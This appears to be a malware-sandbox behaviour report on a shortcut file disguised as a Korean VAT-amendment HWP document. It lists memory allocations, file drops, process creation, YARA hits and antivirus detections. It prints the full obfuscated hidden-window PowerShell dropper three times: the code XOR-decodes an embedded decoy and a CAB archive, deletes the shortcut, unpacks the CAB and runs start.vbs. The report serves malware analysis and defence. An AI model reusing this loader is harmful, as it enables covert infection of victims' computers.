NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02666000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02668000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02669000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05011000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk
file	C:\Users\test22\AppData\Roaming\HNC\Office\Recent\부가가치세 수정신고 안내(부가가치세사무처리규정).hwp.lnk

Creates a shortcut to an executable file (4 events)

file	C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk
file	C:\Users\test22\AppData\Roaming\HNC\Office\Recent\부가가치세 수정신고 안내(부가가치세사무처리규정).hwp.lnk
file	C:\Users\test22\AppData\Local\Temp\부가가치세 수정신고 안내(부가가치세사무처리규정).hwp.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);<#remandment manifoldly#> $GwkiDUHMjE=New-Object <#rashbuss unwinnable#>System.IO.FileStream($ByimtbmyEg,<#pachomian stremmas#>[System.IO.FileMode]::Open,<#snugify coordinateness#>[System.IO.FileAccess]::Read);<#stylet enomotarch#> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,<#pentactinal amble#>[System.IO.SeekOrigin]::Begin);<#predisadvantage anisocratic#> $cKTwlnwsNcq=New-Object <#unseducible nonperpendicularity#>byte[] $EgbvteukmW;<#coronadite spiraloid#> $GwkiDUHMjE.Read($cKTwlnwsNcq,<#uniformest ankylurethria#>0,$EgbvteukmW);<#tablespoonful tracking#> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc <#aureoled herodiones#> $LnMqRSoGrHUl <#gelidium mutualized#> $cKTwlnwsNcq -Encoding <#teliosporiferous nonjurying#> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);<#txt splenectama#> $OWiCCpWxFZLj=Get-ChildItem <#invigilator pastiness#>-Path <#humified flocculant#> $XufbRmnzTCYI -Recurse <#overlaness satellite#>*.lnk <#pomster hitlerism#>| <#sailyard ideologue#>where-object <#stotterel sinkable#>{$_.length <#serbonian prenominated#>-eq 0x0349AE4F} <#indemonstrability oralogist#>| Select-Object <#electrobrasser flambage#>-ExpandProperty <#contacted fishhouse#>FullName; return <#orhamwood countertouch#> $OWiCCpWxFZLj;<#zoophysical provingly#>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp <#uncriticism oglers#>-XufbRmnzTCYI <#breakage noncarbonate#> $qEHFgOjaYnK;if($qkoFVypQqMha.length<#macroscopical crosshatch#> -eq 0){$qkoFVypQqMha=sITqPCecquhp <#cosmo subheadings#> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path <#overmelted overdiluting#> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) <#pharmacosiderite antimasker#>+ '';qrimnpVhAd -ByimtbmyEg <#dextrotartaric sarcococca#> $qkoFVypQqMha -kNeZQMhNGyPy <#trochars modelist#> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP <#uncongestive achieve#> 0x18 -LnMqRSoGrHUl <#visaing aglaozonia#> $TvRfwPBxWW;&<#symplesite lysis#> $TvRfwPBxWW;$pARWiRFyWslt=$env:public <#underpriced colligible#>+ '\' <#hunger uncovers#>+<#superhelix imprudent#> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg <#picturedom yieldable#> $qkoFVypQqMha -kNeZQMhNGyPy <#commutable irrelevancies#> 0x00013876 -EgbvteukmW <#uneviscerated moorman#> 0x00013CDB -HziPgoYBSPP <#waterworm hubba#> 0xC0 -LnMqRSoGrHUl <#unmaudlinly inculpatory#> $pARWiRFyWslt;Remove-Item -Path <#egracias underproduction#> $qkoFVypQqMha -Force;expand $pARWiRFyWslt <#thomistical noster#> -F:* <#auger involucred#> ($env:public <#punting capita#>+<#definitions coalescent#> '\' <#moneymakers doggrelize#>+<#hicks antirestoration#> 'documents');remove-item <#acieration impracticalness#> -path <#supernaturalised shielings#> $pARWiRFyWslt <#cassius starosty#>-force;$TdtCmdVzpdm=$env:public<#caprin utopists#>+'\documents\start.vbs';&<#fatherkin unflared#> $TdtCmdVzpdm;

cmdline

"C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);^<#remandment manifoldly#^> $GwkiDUHMjE=New-Object ^<#rashbuss unwinnable#^>System.IO.FileStream($ByimtbmyEg,^<#pachomian stremmas#^>[System.IO.FileMode]::Open,^<#snugify coordinateness#^>[System.IO.FileAccess]::Read);^<#stylet enomotarch#^> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,^<#pentactinal amble#^>[System.IO.SeekOrigin]::Begin);^<#predisadvantage anisocratic#^> $cKTwlnwsNcq=New-Object ^<#unseducible nonperpendicularity#^>byte[] $EgbvteukmW;^<#coronadite spiraloid#^> $GwkiDUHMjE.Read($cKTwlnwsNcq,^<#uniformest ankylurethria#^>0,$EgbvteukmW);^<#tablespoonful tracking#^> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc ^<#aureoled herodiones#^> $LnMqRSoGrHUl ^<#gelidium mutualized#^> $cKTwlnwsNcq -Encoding ^<#teliosporiferous nonjurying#^> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);^<#txt splenectama#^> $OWiCCpWxFZLj=Get-ChildItem ^<#invigilator pastiness#^>-Path ^<#humified flocculant#^> $XufbRmnzTCYI -Recurse ^<#overlaness satellite#^>*.lnk ^<#pomster hitlerism#^>^| ^<#sailyard ideologue#^>where-object ^<#stotterel sinkable#^>{$_.length ^<#serbonian prenominated#^>-eq 0x0349AE4F} ^<#indemonstrability oralogist#^>^| Select-Object ^<#electrobrasser flambage#^>-ExpandProperty ^<#contacted fishhouse#^>FullName; return ^<#orhamwood countertouch#^> $OWiCCpWxFZLj;^<#zoophysical provingly#^>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp ^<#uncriticism oglers#^>-XufbRmnzTCYI ^<#breakage noncarbonate#^> $qEHFgOjaYnK;if($qkoFVypQqMha.length^<#macroscopical crosshatch#^> -eq 0){$qkoFVypQqMha=sITqPCecquhp ^<#cosmo subheadings#^> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path ^<#overmelted overdiluting#^> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) ^<#pharmacosiderite antimasker#^>+ '';qrimnpVhAd -ByimtbmyEg ^<#dextrotartaric sarcococca#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#trochars modelist#^> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP ^<#uncongestive achieve#^> 0x18 -LnMqRSoGrHUl ^<#visaing aglaozonia#^> $TvRfwPBxWW;^&^<#symplesite lysis#^> $TvRfwPBxWW;$pARWiRFyWslt=$env:public ^<#underpriced colligible#^>+ '\' ^<#hunger uncovers#^>+^<#superhelix imprudent#^> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg ^<#picturedom yieldable#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#commutable irrelevancies#^> 0x00013876 -EgbvteukmW ^<#uneviscerated moorman#^> 0x00013CDB -HziPgoYBSPP ^<#waterworm hubba#^> 0xC0 -LnMqRSoGrHUl ^<#unmaudlinly inculpatory#^> $pARWiRFyWslt;Remove-Item -Path ^<#egracias underproduction#^> $qkoFVypQqMha -Force;expand $pARWiRFyWslt ^<#thomistical noster#^> -F:* ^<#auger involucred#^> ($env:public ^<#punting capita#^>+^<#definitions coalescent#^> '\' ^<#moneymakers doggrelize#^>+^<#hicks antirestoration#^> 'documents');remove-item ^<#acieration impracticalness#^> -path ^<#supernaturalised shielings#^> $pARWiRFyWslt ^<#cassius starosty#^>-force;$TdtCmdVzpdm=$env:public^<#caprin utopists#^>+'\documents\start.vbs';^&^<#fatherkin unflared#^> $TdtCmdVzpdm;

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW June 12, 2024, 10:19 a.m.	thread_identifier: 2312 thread_handle: 0x00000084 process_identifier: 156 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);<#remandment manifoldly#> $GwkiDUHMjE=New-Object <#rashbuss unwinnable#>System.IO.FileStream($ByimtbmyEg,<#pachomian stremmas#>[System.IO.FileMode]::Open,<#snugify coordinateness#>[System.IO.FileAccess]::Read);<#stylet enomotarch#> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,<#pentactinal amble#>[System.IO.SeekOrigin]::Begin);<#predisadvantage anisocratic#> $cKTwlnwsNcq=New-Object <#unseducible nonperpendicularity#>byte[] $EgbvteukmW;<#coronadite spiraloid#> $GwkiDUHMjE.Read($cKTwlnwsNcq,<#uniformest ankylurethria#>0,$EgbvteukmW);<#tablespoonful tracking#> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc <#aureoled herodiones#> $LnMqRSoGrHUl <#gelidium mutualized#> $cKTwlnwsNcq -Encoding <#teliosporiferous nonjurying#> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);<#txt splenectama#> $OWiCCpWxFZLj=Get-ChildItem <#invigilator pastiness#>-Path <#humified flocculant#> $XufbRmnzTCYI -Recurse <#overlaness satellite#>.lnk <#pomster hitlerism#>\| <#sailyard ideologue#>where-object <#stotterel sinkable#>{$_.length <#serbonian prenominated#>-eq 0x0349AE4F} <#indemonstrability oralogist#>\| Select-Object <#electrobrasser flambage#>-ExpandProperty <#contacted fishhouse#>FullName; return <#orhamwood countertouch#> $OWiCCpWxFZLj;<#zoophysical provingly#>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp <#uncriticism oglers#>-XufbRmnzTCYI <#breakage noncarbonate#> $qEHFgOjaYnK;if($qkoFVypQqMha.length<#macroscopical crosshatch#> -eq 0){$qkoFVypQqMha=sITqPCecquhp <#cosmo subheadings#> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path <#overmelted overdiluting#> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) <#pharmacosiderite antimasker#>+ '';qrimnpVhAd -ByimtbmyEg <#dextrotartaric sarcococca#> $qkoFVypQqMha -kNeZQMhNGyPy <#trochars modelist#> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP <#uncongestive achieve#> 0x18 -LnMqRSoGrHUl <#visaing aglaozonia#> $TvRfwPBxWW;&<#symplesite lysis#> $TvRfwPBxWW;$pARWiRFyWslt=$env:public <#underpriced colligible#>+ '\' <#hunger uncovers#>+<#superhelix imprudent#> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg <#picturedom yieldable#> $qkoFVypQqMha -kNeZQMhNGyPy <#commutable irrelevancies#> 0x00013876 -EgbvteukmW <#uneviscerated moorman#> 0x00013CDB -HziPgoYBSPP <#waterworm hubba#> 0xC0 -LnMqRSoGrHUl <#unmaudlinly inculpatory#> $pARWiRFyWslt;Remove-Item -Path <#egracias underproduction#> $qkoFVypQqMha -Force;expand $pARWiRFyWslt <#thomistical noster#> -F: <#auger involucred#> ($env:public <#punting capita#>+<#definitions coalescent#> '\' <#moneymakers doggrelize#>+<#hicks antirestoration#> 'documents');remove-item <#acieration impracticalness#> -path <#supernaturalised shielings#> $pARWiRFyWslt <#cassius starosty#>-force;$TdtCmdVzpdm=$env:public<#caprin utopists#>+'\documents\start.vbs';&<#fatherkin unflared#> $TdtCmdVzpdm; filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 12, 2024, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

One or more non-whitelisted processes were created (4 events)

parent_process	powershell.exe	martian_process	"C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\부가가치세 수정신고 안내(부가가치세사무처리규정).hwp"
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WScript.exe" "C:\Users\Public\documents\start.vbs"
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\부가가치세 수정신고 안내(부가가치세사무처리규정).hwp
parent_process	powershell.exe	martian_process	"C:\Windows\system32\expand.exe" C:\Users\Public\Byimtb.cab -F:* C:\Users\Public\documents

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3044 resumed a thread in remote process 1784
NtResumeThread June 12, 2024, 10:19 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 1784	1	0	0

Creates a suspicious Powershell process (1 event)

option

-windowstyle hidden

value

Attempts to execute command with a hidden window

File has been identified by 25 AntiVirus engines on VirusTotal as malicious (25 events)

Lionic	Trojan.WinLNK.Pantera.4!c
Cynet	Malicious (score: 99)
Skyhigh	BehavesLike.Dropper.rx
VIPRE	Heur.BZC.YAX.Pantera.190.B8512955
Arcabit	Heur.BZC.YAX.Pantera.190.B8512955
Symantec	CL.Downloader!gen20
ESET-NOD32	BAT/TrojanDownloader.Agent.NWV
Avast	LNK:Agent-HS [Trj]
Kaspersky	HEUR:Trojan.WinLNK.Powecod.c
BitDefender	Heur.BZC.YAX.Pantera.190.B8512955
Rising	Trojan.PSRunner/LNK!1.F965 (CLASSIC)
Emsisoft	Heur.BZC.YAX.Pantera.190.B8512955 (B)
F-Secure	Malware.LNK/Dldr.Agent.VPYE
FireEye	Heur.BZC.YAX.Pantera.190.B8512955
Sophos	Mal/PowLnkObf-D
Google	Detected
Avira	LNK/Dldr.Agent.VPYE
MAX	malware (ai score=84)
Kingsoft	Script.Troj.BigLnk.22142
ZoneAlarm	HEUR:Trojan.WinLNK.Powecod.c
GData	Heur.BZC.YAX.Pantera.190.B8512955
VBA32	Trojan.Link.Crafted
SentinelOne	Static AI - Suspicious LNK
Fortinet	LNK/Agent.NWV!tr
AVG	LNK:Agent-HS [Trj]

The processes powershell.exe, wscript.exe wrote an executable file to disk which it then attempted to execute (23 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe
file	C:\Windows\System32\expand.exe
file	C:\Windows\SysWOW64\wscript.exe

부가가치세 수정신고 안내(부가가치세사무처리규정).hwp.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All